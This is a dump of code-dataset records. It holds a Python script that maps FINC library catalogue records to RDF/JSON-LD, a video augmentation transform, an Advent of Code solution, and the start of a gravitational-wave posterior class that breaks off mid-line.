\"KalligrafIn\",\n \"clr\": \"KoloristIn\",\n \"clt\": \"LichtdruckerIn\",\n \"cmm\": \"KommentatorIn\",\n \"cmp\": \"KomponistIn\",\n \"cmt\": \"SchriftsetzerIn\",\n \"cnd\": \"DirigentIn\",\n \"cng\": \"Kameramann/frau\",\n \"cns\": \"ZensorIn\",\n \"coe\": \"BerufungsbeklagteR im streitigen Verfahren\",\n \"col\": \"SammlerIn\",\n \"com\": \"ZusammenstellendeR\",\n \"con\": \"KonservatorIn\",\n \"cor\": \"SammlungskuratorIn\",\n \"cos\": \"AnfechtendeR, bestreitende Partei\",\n \"cot\": \"BerufungsklägerIn im streitigen Verfahren\",\n \"cou\": \"zuständiges Gericht\",\n \"cov\": \"UmschlaggestalterIn\",\n \"cpc\": \"BeansprucherIn des Urheberrechts\",\n \"cpe\": \"BeschwerdeführerIn-BerufungsbeklagteR\",\n \"cph\": \"InhaberIn des Urheberrechts\",\n \"cpl\": \"BeschwerdeführerIn/KlägerIn\",\n \"cpt\": \"KlägerIn/BerufungsklägerIn\",\n \"cre\": \"GeistigeR SchöpferIn\",\n \"crp\": \"KorrespondentIn\",\n \"crr\": \"KorrektorIn\",\n \"crt\": \"GerichtsstenografIn\",\n \"csl\": \"BeraterIn\",\n \"csp\": \"ProjektberaterIn\",\n \"cst\": \"KostümbildnerIn\",\n \"ctb\": \"MitwirkendeR\",\n \"cte\": \"AnfechtungsgegnerIn-BerufungsbeklagteR\",\n \"ctg\": \"KartografIn\",\n \"ctr\": \"VertragspartnerIn\",\n \"cts\": \"AnfechtungsgegnerIn\",\n \"ctt\": \"AnfechtungsgegnerIn-BerufungsklägerIn\",\n \"cur\": \"KuratorIn\",\n \"cwt\": \"KommentatorIn\",\n \"dbp\": \"Erscheinungsort\",\n \"dfd\": \"AngeklagteR/BeklagteR\",\n \"dfe\": \"AngeklagteR/BeklagteR-BerufungsbeklagteR\",\n \"dft\": \"AngeklagteR/BeklagteR-BerufungsklägerIn\",\n \"dgg\": \"Grad-verleihende Institution\",\n \"dgs\": \"AkademischeR BetreuerIn\",\n \"dir\": \"Dirigent\",\n \"dis\": \"PromovierendeR\",\n \"dln\": \"VorzeichnerIn\",\n \"dnc\": \"TänzerIn\",\n \"dnr\": \"GeldgeberIn\",\n \"dpc\": \"AbgebildeteR\",\n \"dpt\": \"AnlegerIn\",\n \"drm\": \"TechnischeR ZeichnerIn\",\n \"drt\": \"RegisseurIn\",\n \"dsr\": \"DesignerIn\",\n \"dst\": \"Vertrieb\",\n \"dtc\": \"BereitstellerIn von Daten\",\n \"dte\": \"WidmungsempfängerIn\",\n \"dtm\": \"DatenmanagerIn\",\n \"dto\": \"WidmendeR\",\n \"dub\": \"angeblicheR AutorIn\",\n \"edc\": \"BearbeiterIn der Zusammenstellung\",\n \"edm\": \"CutterIn\",\n \"edt\": \"HerausgeberIn\",\n \"egr\": \"StecherIn\",\n \"elg\": \"ElektrikerIn\",\n \"elt\": \"GalvanisiererIn\",\n \"eng\": \"IngenieurIn\",\n \"enj\": \"Normerlassende Gebietskörperschaft\",\n \"etr\": \"RadiererIn\",\n \"evp\": \"Veranstaltungsort\",\n \"exp\": \"ExperteIn\",\n \"fac\": \"FacsimilistIn\",\n \"fds\": \"Filmvertrieb\",\n \"fld\": \"BereichsleiterIn\",\n \"flm\": \"BearbeiterIn des Films\",\n \"fmd\": \"FilmregisseurIn\",\n \"fmk\": \"FilmemacherIn\",\n \"fmo\": \"frühereR BesitzerIn\",\n \"fmp\": \"FilmproduzentIn\",\n \"fnd\": \"GründerIn\",\n \"fpy\": \"Erste Partei\",\n \"frg\": \"FälscherIn\",\n \"gis\": \"GeographIn\",\n \"grt\": \"GraphischeR TechnikerIn\",\n \"hg\": \"Herausgeber\",\n \"his\": \"Gastgebende Institution\",\n \"hnr\": \"GefeierteR\",\n \"hst\": \"GastgeberIn\",\n \"Ill\": \"Illustrator\",\n \"ill\": \"IllustratorIn\",\n \"ilu\": \"Illuminator, BuchmalerIn\",\n \"ins\": \"InserierendeR\",\n \"inv\": \"ErfinderIn\",\n \"isb\": \"Herausgebendes Organ\",\n \"itr\": \"InstrumentalmusikerIn\",\n \"ive\": \"InterviewteR\",\n \"ivr\": \"InterviewerIn\",\n \"jud\": \"RichterIn\",\n \"jug\": \"zuständige Gerichtsbarkeit\",\n \"kad\": \"Kadenzverfasser\",\n \"lbr\": \"Labor\",\n \"lbt\": \"LibrettistIn\",\n \"ldr\": \"Laborleitung\",\n \"led\": \"Führung\",\n \"lee\": \"Libelee-appellee\",\n \"lel\": \"BeklagteR im Seerecht/Kirchenrecht\",\n \"len\": \"LeihgeberIn\",\n \"let\": \"Libelee-appellant\",\n \"lgd\": \"LichtgestalterIn\",\n \"lie\": \"Libelant-appellee\",\n \"lil\": \"KlägerIn im Seerecht/Kirchenrecht\",\n \"lit\": \"Libelant-appellant\",\n \"lsa\": \"LandschaftsarchitektIn\",\n \"lse\": \"LizenznehmerIn\",\n \"lso\": \"LizenzgeberIn\",\n \"ltg\": \"LithographIn\",\n \"lyr\": \"TextdichterIn\",\n \"mcp\": \"ArrangeurIn, Notenleser/-schreiberIn\",\n \"mdc\": \"Metadatenkontakt\",\n \"med\": \"Medium\",\n \"mfp\": \"Herstellungsort\",\n \"mfr\": \"HerstellerIn\",\n \"mod\": \"ModeratorIn\",\n \"mon\": \"BeobachterIn\",\n \"mrb\": \"MarmorarbeiterIn, MarmoriererIn\",\n \"mrk\": \"Markup-EditorIn\",\n \"msd\": \"MusikalischeR LeiterIn\",\n \"mte\": \"Metall-GraveurIn\",\n \"mtk\": \"ProtokollantIn\",\n \"mus\": \"MusikerIn\",\n \"nrt\": \"ErzählerIn\",\n \"opn\": \"GegnerIn\",\n \"org\": \"UrheberIn\",\n \"orm\": \"VeranstalterIn\",\n \"osp\": \"On-screen PräsentatorIn\",\n \"oth\": \"BerichterstatterIn\",\n \"own\": \"BesitzerIn\",\n \"pan\": \"DiskussionsteilnehmerIn\",\n \"pat\": \"SchirmherrIn\",\n \"pbd\": \"Verlagsleitung\",\n \"pbl\": \"Verlag\",\n \"pdr\": \"Projektleitung\",\n \"pfr\": \"Korrektur\",\n \"pht\": \"FotografIn\",\n \"plt\": \"DruckformherstellerIn\",\n \"pma\": \"Genehmigungsstelle\",\n \"pmn\": \"Produktionsleitung\",\n \"pop\": \"PlattendruckerIn\",\n \"ppm\": \"PapiermacherIn\",\n \"ppt\": \"PuppenspielerIn\",\n \"pra\": \"Praeses\",\n \"prc\": \"Prozesskontakt\",\n \"prd\": \"Produktionspersonal\",\n \"pre\": \"PräsentatorIn\",\n \"prf\": \"AusführendeR\",\n \"prg\": \"ProgrammiererIn\",\n \"prm\": \"DruckgrafikerIn\",\n \"prn\": \"Produktionsfirma\",\n \"pro\": \"ProduzentIn\",\n \"prp\": \"Produktionsort\",\n \"prs\": \"SzenenbildnerIn\",\n \"prt\": \"DruckerIn\",\n \"prv\": \"AnbieterIn\",\n \"pta\": \"PatentanwärterIn\",\n \"pte\": \"KlägerIn-BerufungsbeklagteR\",\n \"ptf\": \"ZivilklägerIn\",\n \"pth\": \"PatentinhaberIn\",\n \"ptt\": \"KlägerIn-BerufungsklägerIn\",\n \"pup\": \"Veröffentlichungsort\",\n \"rbr\": \"RubrikatorIn\",\n \"rcd\": \"TonmeisterIn\",\n \"rce\": \"ToningenieurIn\",\n \"rcp\": \"AdressatIn\",\n \"rdd\": \"HörfunkregisseurIn\",\n \"Red\": \"Redakteur\",\n \"red\": \"RedakteurIn\",\n \"ren\": \"RendererIn (Bildverarbeitung)\",\n \"res\": \"ForscherIn\",\n \"rev\": \"RezensentIn, GutachterIn\",\n \"rpc\": \"HörfunkproduzentIn\",\n \"rps\": \"Aufbewahrungsort, TreuhänderIn\",\n \"rpt\": \"ReporterIn\",\n \"rpy\": \"Verantwortliche Partei\",\n \"rse\": \"AntragsgegnerIn-BerufungsbeklagteR\",\n \"rsg\": \"RegisseurIn der Wiederaufführung\",\n \"rsp\": \"RespondentIn\",\n \"rsr\": \"RestauratorIn\",\n \"rst\": \"AntragsgegnerIn-BerufungsklägerIn\",\n \"rth\": \"Leitung des Forschungsteams\",\n \"rtm\": \"Mitglied des Forschungsteams\",\n \"sad\": \"WissenschaftlicheR BeraterIn\",\n \"sce\": \"DrehbuchautorIn\",\n \"scl\": \"BildhauerIn\",\n \"scr\": \"SchreiberIn\",\n \"sds\": \"Tongestalter\",\n \"sec\": \"SekretärIn\",\n \"sgd\": \"BühnenregisseurIn\",\n \"sgn\": \"UnterzeichnerIn\",\n \"sht\": \"Unterstützender Veranstalter\",\n \"sll\": \"VerkäuferIn\",\n \"sng\": \"SängerIn\",\n \"spk\": \"RednerIn\",\n \"spn\": \"SponsorIn\",\n \"spy\": \"Zweite Partei\",\n \"srv\": \"LandvermesserIn\",\n \"std\": \"BühnenbildnerIn\",\n \"stg\": \"Kulisse\",\n \"stl\": \"GeschichtenerzählerIn\",\n \"stm\": \"InszenatorIn\",\n \"stn\": \"Normungsorganisation\",\n \"str\": \"StereotypeurIn\",\n \"tcd\": \"Technische Leitung\",\n \"tch\": \"LehrerIn\",\n \"ths\": \"BetreuerIn (Doktorarbeit)\",\n \"tld\": \"FernsehregisseurIn\",\n \"tlp\": \"FernsehproduzentIn\",\n \"trc\": \"TranskribiererIn\",\n \"trl\": \"ÜbersetzerIn\",\n \"tyd\": \"Schrift-DesignerIn\",\n \"tyg\": \"SchriftsetzerIn\",\n \"uvp\": \"Hochschulort\",\n \"vac\": \"SynchronsprecherIn\",\n \"vdg\": \"BildregisseurIn\",\n \"voc\": \"VokalistIn\",\n \"wac\": \"KommentarverfasserIn\",\n \"wal\": \"VerfasserIn von zusätzlichen Lyrics\",\n \"wam\": \"AutorIn des Begleitmaterials\",\n \"wat\": \"VerfasserIn von Zusatztexten\",\n \"wdc\": \"HolzschneiderIn\",\n \"wde\": \"HolzschnitzerIn\",\n \"win\": \"VerfasserIn einer Einleitung\",\n \"wit\": \"ZeugeIn\",\n \"wpr\": \"VerfasserIn eines Vorworts\",\n \"wst\": \"VerfasserIn von ergänzendem Text\"\n}\n\nbaseuri = \"http://data.finc.info/resources/\"\n\n\nprop2isil = {\"swb_id_str\": \"(DE-576)\",\n \"kxp_id_str\": \"(DE-627)\"\n }\n\n\ndef fixRecord(record=\"\", record_id=0, validation=False, replaceMethod='decimal'):\n replaceMethods = {\n 'decimal': (('#29;', '#30;', '#31;'), (\"\\x1D\", \"\\x1E\", \"\\x1F\")),\n 'unicode': (('\\u001d', '\\u001e', '\\u001f'), (\"\\x1D\", \"\\x1E\", \"\\x1F\")),\n 'hex': (('\\x1D', '\\x1E', '\\x1F'), (\"\\x1D\", \"\\x1E\", \"\\x1F\"))\n }\n marcFullRecordFixed=record\n for i in range(0, 3):\n marcFullRecordFixed=marcFullRecordFixed.replace(replaceMethods.get(replaceMethod)[0][i], replaceMethods.get(replaceMethod)[1][i])\n if validation:\n try:\n reader = pymarc.MARCReader(marcFullRecordFixed.encode('utf8'), utf8_handling='replace')\n marcrecord = next(reader)\n except (RecordLengthInvalid, RecordLeaderInvalid, BaseAddressNotFound, BaseAddressInvalid, RecordDirectoryInvalid, NoFieldsFound, UnicodeDecodeError) as e:\n eprint(\"record id {0}:\".format(record_id)+str(e))\n with open('invalid_records.txt', 'a') as error:\n eprint(marcFullRecordFixed,file=error)\n return None\n return marcFullRecordFixed\n\n\ndef ArrayOrSingleValue(array):\n '''\n return an array\n if there is only a single value, only return that single value\n '''\n if isinstance(array, (int, float)):\n return array\n if array:\n length = len(array)\n if length > 1 or isinstance(array, dict):\n return array\n elif length == 1:\n for elem in array:\n return elem\n elif length == 0:\n return None\n\n\ndef eprint(*args, **kwargs):\n '''\n print to stderr\n '''\n print(*args, file=sys.stderr, **kwargs)\n\n\ndef getIDs(record, prop):\n if isinstance(prop, str):\n if prop in prop2isil and prop in record:\n return str(prop2isil[prop]+record[prop])\n elif prop in record and not prop in prop2isil:\n return str(record[prop])\n elif isinstance(prop, list):\n ret = []\n for elem in prop:\n if elem in prop2isil and elem in record:\n ret.append(str(prop2isil[elem]+record[elem]))\n elif elem in record and not elem in prop2isil:\n ret.append(record[elem])\n if ret:\n return ret\n\n\ndef getoAC(record, prop):\n if isinstance(record.get(prop), str):\n if record.get(prop) == \"Free\":\n return \"Yes\"\n elif isinstance(record.get(prop), list):\n for elem in record.get(prop):\n if elem == \"Free\":\n return \"Yes\"\n\n\ndef getAtID(record, prop):\n if record.get(prop):\n return baseuri+record[prop]\n\n\ndef getGND(record, prop):\n ret = []\n if isinstance(record.get(prop), str):\n return \"http://d-nb.info/gnd/\"+record.get(prop)\n elif isinstance(record.get(prop), list):\n for elem in record.get(prop):\n ret.append(\"http://d-nb.info/gnd/\"+elem)\n if ret:\n return ret\n else:\n return None\n\n\ndef getLanguage(record, prop):\n lang = getProperty(record, prop)\n if lang:\n language = {\"en\": lang}\n return language\n\n\ndef getTitle(record, prop):\n title = getProperty(record, prop)\n if title:\n if isinstance(title, str):\n if title[-2:] == \" /\":\n title = title[:-2]\n elif isinstance(title, list):\n for n, elem in enumerate(title):\n if elem[-2:] == \" /\":\n title[n] = title[n][:-2]\n return title\n\n\ndef getformat(record, prop, formattable):\n if isinstance(record.get(prop), str) and record.get(prop) in formattable:\n return formattable.get(record.get(prop))\n elif isinstance(record.get(prop), list):\n for elem in record.get(prop):\n if elem in formattable:\n return formattable.get(elem)\n\n\ndef getFormatRdfType(record, prop):\n formatmapping = {\"Article, E-Article\": \"bibo:Article\",\n \"Book, E-Book\": \"bibo:Book\",\n \"Journal, E-Journal\": \"bibo:Periodical\",\n \"Manuscript\": \"bibo:Manuscript\",\n \"Map\": \"bibo:Map\",\n \"Thesis\": \"bibo:Thesis\",\n \"Video\": \"bibo:AudioVisualDocument\"\n }\n value = getformat(record, prop, formatmapping)\n if value:\n return {\"@id\": value}\n else:\n return {\"@id\": \"bibo:Document\"}\n\n\ndef getFormatDctMedium(record, prop):\n formatmapping = {\"Audio\": \"rdamt:1001\",\n \"Microform\": \"rdamt:1002\",\n \"Notated Music\": \"rdau:P60488\"\n }\n value = getformat(record, prop, formatmapping)\n return value if value else None\n\n\ndef getOfferedBy(record, prop):\n if record.get(prop):\n return {\n \"@type\": \"http://schema.org/Offer\",\n \"schema:offeredBy\": {\n \"@id\": \"https://data.finc.info/organisation/DE-15\",\n \"@type\": \"schema:Library\",\n \"schema:name\": \"Univeristätsbibliothek Leipzig\",\n \"schema:branchCode\": \"DE-15\"\n },\n \"schema:availability\": \"http://data.ub.uni-leipzig.de/item/wachtl/DE-15:ppn:\"+record[prop]\n }\n\n\ndef getProperty(record, prop):\n ret = []\n if isinstance(prop, str):\n if prop in record:\n return record.get(prop)\n elif isinstance(prop, list):\n for elem in prop:\n if isinstance(record.get(elem), str):\n ret.append(record[elem])\n elif isinstance(record.get(elem), list):\n for elen in record[elem]:\n ret.append(elen)\n if ret:\n return ret\n else:\n return None\n\n\ndef getIsPartOf(record, prop):\n data = getProperty(record, prop)\n if isinstance(data, str):\n return {\"@id\": \"https://data.finc.info/resources/\"+data}\n elif isinstance(data, list):\n ret = []\n for elem in data:\n ret.append({\"@id\": \"https://data.finc.info/resources/\"+elem})\n return ret\n\n\ndef getIssued(record, prop):\n data = getProperty(record, prop)\n if isinstance(data, str):\n return {context.get(\"dateTime\"): data}\n elif isinstance(data, list):\n ret = []\n for elem in data:\n ret.append({\"@type\": \"xsd:gYear\",\n \"@value\": elem})\n return ret\n\n\n\"\"\"...\n \"contribution\" : [ {\n \"type\" : [ \"Contribution\" ],\n \"agent\" : {\n \"id\" : \"http://d-nb.info/gnd/1049709292\",\n \"type\" : [ \"Person\" ],\n \"dateOfBirth\" : \"1974\",\n \"gndIdentifier\" : \"1049709292\",\n \"label\" : \"Nichols, Catherine\" \n },\n \"role\" : {\n \"id\" : \"http://id.loc.gov/vocabulary/relators/edt\",\n \"label\" : \"Herausgeber/in\" \n }\n }, {\n \"type\" : [ \"Contribution\" ],\n \"agent\" : {\n \"id\" : \"http://d-nb.info/gnd/130408026\",\n \"type\" : [ \"Person\" ],\n \"dateOfBirth\" : \"1951\",\n \"gndIdentifier\" : \"130408026\",\n \"label\" : \"Blume, Eugen\" \n },\n \"role\" : {\n \"id\" : \"http://id.loc.gov/vocabulary/relators/ctb\",\n \"label\" : \"Mitwirkende\" \n }\n }\n\"\"\"\n\n\ndef get_contributon(record, prop):\n fullrecord_fixed = fixRecord(record=getProperty(record, prop), record_id=record.get(\n \"record_id\"), validation=False, replaceMethod='decimal')\n reader = pymarc.MARCReader(fullrecord_fixed.encode('utf-8'))\n data = []\n fields = [\"100\", \"110\", \"111\", \"700\", \"710\", \"711\"]\n for record in reader:\n for field in fields:\n for f in record.get_fields(field):\n contributor = {\n \"@type\": [\"bf:Contribution\"],\n \"bf:agent\": {\n \"@id\": \"http://d-nb.info/gnd/\"\n },\n \"bf:role\": {\n \"@id\": \"http://id.loc.gov/vocabulary/relators/\",\n }\n }\n if f['a']:\n contributor[\"bf:agent\"][\"rdfs:ch_label\"] = f['a']\n if f['0'] and f['0'].startswith(\"(DE-588)\"):\n contributor[\"bf:agent\"][\"@id\"] += f['0'].split(\")\")[1]\n else:\n del contributor['bf:agent']['@id']\n if f['4'] and len(f['4']) <= 4:\n if f['4'][0] == '-':\n contributor['bf:role']['@id'] += f['4'][1:]\n if rolemapping.get(f['4'][1:]):\n contributor['bf:role']['rdfs:ch_label'] = rolemapping[f['4'][1:]]\n else:\n contributor['bf:role']['@id'] += f['4']\n if rolemapping.get(f['4']):\n contributor['bf:role']['rdfs:ch_label'] = rolemapping[f['4']]\n else:\n del contributor['bf:role']\n if field[1:] == \"00\":\n contributor['bf:agent']['@type'] = 'bf:Person'\n elif field[1:] == \"10\":\n contributor['bf:agent']['@type'] = 'bf:Organization'\n elif field[1:] == \"11\":\n contributor['bf:agent']['@type'] = 'bf:Meeting'\n if contributor['bf:agent'].get('rdfs:ch_label'):\n data.append(contributor)\n\n return data if data else None\n\n\ndef get_rvk(record, prop):\n if prop in record:\n for rvk in record[prop]:\n if rvk == \"No subject assigned\":\n continue\n elif isinstance(rvk, str):\n return str(\"https://rvk.uni-regensburg.de/regensburger-verbundklassifikation-online#notation/{}\".format(rvk))\n\n\ndef putContext(record):\n return context\n\n# mapping={ \"target_field\":\"someString\"},\n\n# \"target_field\":{function:\"source_field\"}}\n\n\ncontext = {\n \"xsd\": \"http://www.w3.org/2001/XMLSchema#\",\n \"bf\": \"http://id.loc.gov/ontologies/bibframe/\",\n \"dct\": \"http://purl.org/dc/terms/\",\n \"dc\": \"http://purl.org/dc/terms/\",\n \"bibo\": \"http://purl.org/ontology/bibo/\",\n \"rdau\": \"http://rdaregistry.info/Elements/u/\",\n \"umbel\": \"http://umbel.org/umbel/\",\n \"isbd\": \"http://iflastandards.info/ns/isbd/elements/\",\n \"schema\": \"http://schema.org/\",\n \"rdfs\": \"https://www.w3.org/TR/rdf-schema/#\",\n \"issued\": {\n \"@id\": \"dct:issued\",\n \"@type\": \"xsd:gYear\"\n },\n \"identifier\": {\n \"@id\": \"dct:identifier\",\n \"@type\": \"xsd:string\"\n },\n \"language\": {\n \"@id\": \"http://purl.org/dc/terms/language\",\n \"@container\": \"@language\"\n },\n \"openAccessContent\": \"http://dbpedia.org/ontology/openAccessContent\",\n}\n\n\nmapping = {\n \"@context\": putContext,\n \"@id\": {getAtID: \"id\"},\n \"identifier\": {getIDs: [\"swb_id_str\", \"kxp_id_str\"]},\n \"bibo:issn\": {getProperty: \"issn\"},\n \"bibo:isbn\": {getProperty: \"isbn\"},\n \"umbel:isLike\": {getProperty: \"url\"},\n \"dct:title\": {getTitle: \"title\"},\n \"rdau:P60493\": {getTitle: [\"title_part\", \"title_sub\"]},\n \"bibo:shortTitle\": {getTitle: \"title_short\"},\n \"dct:alternative\": {getTitle: \"title_alt\"},\n \"rdau:P60327\": {getProperty: \"author\"},\n \"dc:contributor\": {getProperty: \"author2\"},\n # \"author_id\":{getGND:\"author_id\"},\n \"rdau:P60333\": {getProperty: \"imprint_str_mv\"},\n \"rdau:P60163\": {getProperty: \"publishPlace\"},\n \"dct:publisher\": {getProperty: \"publisher\"},\n \"issued\": {getIssued: \"publishDate\"},\n \"rdau:P60489\": {getProperty: \"dissertation_note\"},\n \"isbd:P1053\": {getProperty: \"physical\"},\n \"language\": {getLanguage: \"language\"},\n \"dct:isPartOf\": {getIsPartOf: \"hierarchy_top_id\"},\n \"dct:bibliographicCitation\": {getProperty: [\"container_title\", \"container_reference\"]},\n \"rdfs:ch_type\": {getFormatRdfType: \"format_finc\"},\n \"dct:medium\": {getFormatDctMedium: \"format_finc\"},\n \"openAccessContent\": {getoAC: \"facet_avail\"},\n \"schema:offers\": {getOfferedBy: \"record_id\"},\n \"bf:contribution\": {get_contributon: \"fullrecord\"},\n \"umbel:relatesToNotation\": {get_rvk: \"rvk_facet\"}\n}\n\n\ndef process_field(record, source_field):\n ret = []\n if isinstance(source_field, dict):\n for function, parameter in source_field.items():\n ret.append(function(record, parameter))\n elif isinstance(source_field, str):\n return value\n elif isinstance(source_field, list):\n for elem in value:\n ret.append(ArrayOrSingleValue(process_field(record, elem)))\n elif callable(source_field):\n return ArrayOrSingleValue(source_field(record))\n if ret:\n return ArrayOrSingleValue(ret)\n\n\ndef removeNone(obj):\n if isinstance(obj, (list, tuple, set)):\n return type(obj)(removeNone(x) for x in obj if x is not None)\n elif isinstance(obj, dict):\n return type(obj)((removeNone(k), removeNone(v))\n for k, v in obj.items() if k is not None and v is not None)\n else:\n return obj\n\n\nlock = Lock()\n\n\ndef process_line(record):\n try:\n mapline = {}\n for key, val in mapping.items():\n value = process_field(record, val)\n if value:\n mapline[key] = value\n mapline = removeNone(mapline)\n if mapline:\n with lock:\n sys.stdout.write(json.dumps(mapline, indent=None)+\"\\n\")\n sys.stdout.flush()\n except Exception as e:\n with open(\"errors.txt\", 'a') as f:\n traceback.print_exc(file=f)\n\n\ndef gen_solrdump_cmd(host):\n fl = set()\n for k, v in mapping.items():\n if not callable(v):\n for c, w in v.items():\n if isinstance(w, str):\n fl.add(w)\n elif isinstance(w, list):\n for elem in w:\n fl.add(elem)\n return \"solrdump -verbose -server {} -fl {}\".format(host, ','.join(fl))\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='simple LOD Mapping of FINC-Records')\n parser.add_argument('-gen_cmd', action=\"store_true\",\n help='generate bash command')\n parser.add_argument(\n '-server', type=str, help=\"which server to use for harvest, only used for cmd prompt definition\")\n args = parser.parse_args()\n if args.gen_cmd:\n print(gen_solrdump_cmd(args.server))\n quit()\n p = Pool(4)\n for line in sys.stdin:\n p.apply_async(process_line, args=(json.loads(line),))\n #target_record=process_line(json.loads(line))\n #if target_record:\n #print(json.dumps(target_record))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"slub/efre-lod-elasticsearch-tools","sub_path":"processing/finc2rdf.py","file_name":"finc2rdf.py","file_ext":"py","file_size_in_byte":23802,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"69890583792","text":"# Kinetics default transform in MViT\n# from https://github.com/facebookresearch/SlowFast/\n# https://arxiv.org/pdf/2104.11227.pdf\nimport torch\nfrom torchvision import transforms\n\nfrom utils import clip_transforms\nfrom .rand_augment import rand_augment_transform\nfrom .random_erasing import RandomErasing\nfrom PIL import Image\n\n\ndef mvit_transform(args):\n auto_augment = \"rand-m7-n4-mstd0.5-inc1\"\n\n img_size_min = args.crop_size\n aa_params = {\"translate_const\": int(img_size_min * 0.45)}\n aa_params[\"interpolation\"] = Image.BICUBIC\n\n aug_transform = transforms.Compose([\n clip_transforms.ClipRandomResizedCrop(args.crop_size, scale=(0.08, 1.), ratio=(0.75, 1.3333333333333333)),\n rand_augment_transform(auto_augment, aa_params),\n clip_transforms.ClipRandomHorizontalFlip(p=0.0 if args.no_horizontal_flip else 0.5),\n clip_transforms.ToClipTensor(),\n clip_transforms.ClipNormalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n transforms.Lambda(lambda clip: torch.stack(clip, dim=0)), # T, C, H, W\n RandomErasing(0.25, mode=\"pixel\", max_count=1, num_splits=False, device=\"cpu\"),\n transforms.Lambda(lambda clip: torch.transpose(clip, 0, 1)) # C, T, H, W\n ])\n\n return aug_transform","repo_name":"ZhaofanQiu/Optimization-Planning-for-3D-ConvNets","sub_path":"utils/mvit_transform/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"72384438829","text":"with open('data/my_input/15.in') as f:\n lines = [ line.strip() for line in f]\n\nwith open('data/test/15.test') as f2:\n tests = [ test.strip() for test in f2]\n\ndef part1(vlines,num):\n d=dict()\n li= ''.join(vlines).split(\",\")\n r=1\n \n lastindex=dict()\n for i,j in enumerate(li):\n lastindex[int(j)]=i+1\n prev=int(j)\n r=i+1\n\n new=True\n while r!=num:\n r+=1\n if new :\n \n #speak\n prev=0\n \n #precalculate\n if prev in lastindex:\n d[prev]=r-lastindex[prev]\n new=False\n else:\n new=True\n \n \n #record\n lastindex[prev]=r\n\n else:\n #speak\n prev=d[prev]\n\n #precalculate\n if prev in lastindex:\n new=False\n d[prev]=r-lastindex[prev]\n else:\n new=True\n\n #record\n lastindex[prev]=r\n \n return prev\n\n\nprint(\"test part1\",part1(tests,2020))\nprint(\"output part1\",part1(lines,2020))\nprint(\"test part2\",part1(tests,30000000))\nprint(\"output part2\",part1(lines,30000000))","repo_name":"cthiounn/adventofcode-2020-python","sub_path":"day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"24827630366","text":"import numpy as np\nimport fftw3\nimport lal\nimport lalsimulation as ls\nfrom posterior_utils import *\nfrom pylal import SimInspiralUtils\nimport scipy.interpolate as si\nimport scipy.stats as st\nimport utils as u\n\nclass Posterior(object):\n \"\"\"Callable object representing the posterior.\"\"\"\n\n def __init__(self, time_data=None, freq_data=None,\n inj_params=None, inj_xml=None, event=0, srate=16384,\n T=None, time_offset=lal.LIGOTimeGPS(0),\n approx=ls.TaylorF2, amp_order=-1, phase_order=-1,\n fmin=20.0, fref=100.0, malmquist_snr=None, mmin=1.0,\n mmax=35.0, dmax=1000.0, dataseed=None,\n data_psdparams=None, detectors=['H1', 'L1', 'V1'],\n psd=None, npsdfit=4):\n r\"\"\"Set up the posterior. Currently only does PE on H1 with iIGOIGO\n analytic noise spectrum.\n\n :param time_data: A list of float arrays giving the\n time-domain data in each detector on which the analysis is\n to operate. If ``None``, then data are generated from\n Gaussian noise. The time-domain data will be windowed with\n the default Tukey window from :func:`u.tukey_window` before\n being Fourier-transformed.\n\n :param freq_data: A list of complex arrays giving the\n frequency-domain data in each detector on which the analysis\n is to operate. If both ``time_data`` and ``freq_data`` are\n ``None`` then data are generated from Gaussian noise.\n\n :param inj_params: Parameters for a waveform to be injected.\n\n :param inj_xml: XML filename describing a waveform to be\n injected.\n\n :param event: The event number (starting with zero) of the\n injection from the XML.\n\n :param srate: The sample rate, in Hz.\n\n :param T: The total length of the data segment (in seconds).\n If ``None``, extracted from ``time_data``.\n\n :param time_offset: The GPS start time of the segment being\n analyized.\n\n :param approx: The waveform approximant to use (currently only\n frequency-domain waveforms are supported).\n\n :param amp_order: The amplitude order parameter for the\n waveform. Use ``-1`` for maximum order.\n\n :param phase_order: The phase order for the waveform. Use\n ``-1`` for maximum order.\n\n :param fmin: The minimum frequency for the analysis.\n\n :param fref: The reference frequency where freq-dependent\n waveform quantities are computed.\n\n :param malmquist_snr: If not ``None``, gives the SNR threshold\n in the second-loudest detector (or only detector) below\n which the prior probability is zero.\n\n :param mmin: Minimum component mass threshold.\n\n :param mmax: Maximum component mass threshold.\n \n :param dmax: Maximum distance.\n\n :param dataseed: If not ``None``, will be used as a RNG seed\n for generating any synthetic data.\n\n :param data_psdparams: If not ``None``, the PSD fitting\n parameters to be used to modify the PSD when producing\n synthetic data. This argument only makes sense when both\n ``time_data`` and ``freq_data`` are ``None``.\n\n :param detectors: The detectors on which the analysis runs.\n\n :param psd: A list of PSDs to use instead of the synthetic\n AdLIGO PSD from LALSimultion. There should be one PSD per\n detector.\n\n :param npsdfit: The number of PSD fitting parameters to use.\n\n \"\"\"\n\n self._srate = srate\n self._time_offset = u.GPSTime(time_offset.gpsSeconds, time_offset.gpsNanoSeconds)\n self._approx = approx\n self._amp_order = amp_order\n self._phase_order = phase_order\n self._fmin = fmin\n self._fref = fref\n self._msnr = malmquist_snr\n self._mmin = mmin\n self._mmax = mmax\n self._dmax = dmax\n self._detectors = detectors\n\n if T is None:\n self._T = time_data[0].shape[0]/srate\n else:\n self._T = T\n\n data_length = int(round(self.T*self.srate/2+1))\n\n self._fs = np.linspace(0, srate/2.0, self.T*self.srate/2+1)\n\n self._npsdfit = npsdfit\n self._psdfitfs = np.exp(np.linspace(np.log(self.fmin), np.log(self.fs[-1]), self.npsdfit))\n\n if psd is not None:\n # Cut the PSD down to length if it's too long\n self._psd = [p[:self.fs.shape[0]] for p in psd]\n else:\n self._psd = [np.zeros(self.fs.shape[0]) for d in detectors]\n for d, psd in zip(detectors, self.psd):\n if d[0] == 'H' or d[0] == 'L':\n for i in range(self.fs.shape[0]):\n psd[i] = ls.SimNoisePSDaLIGOZeroDetHighPower(self.fs[i])\n elif d[0] == 'V':\n for i in range(self.fs.shape[0]):\n psd[i] = ls.SimNoisePSDAdvVirgo(self.fs[i])\n\n # Zero out PSD below fmin\n for p 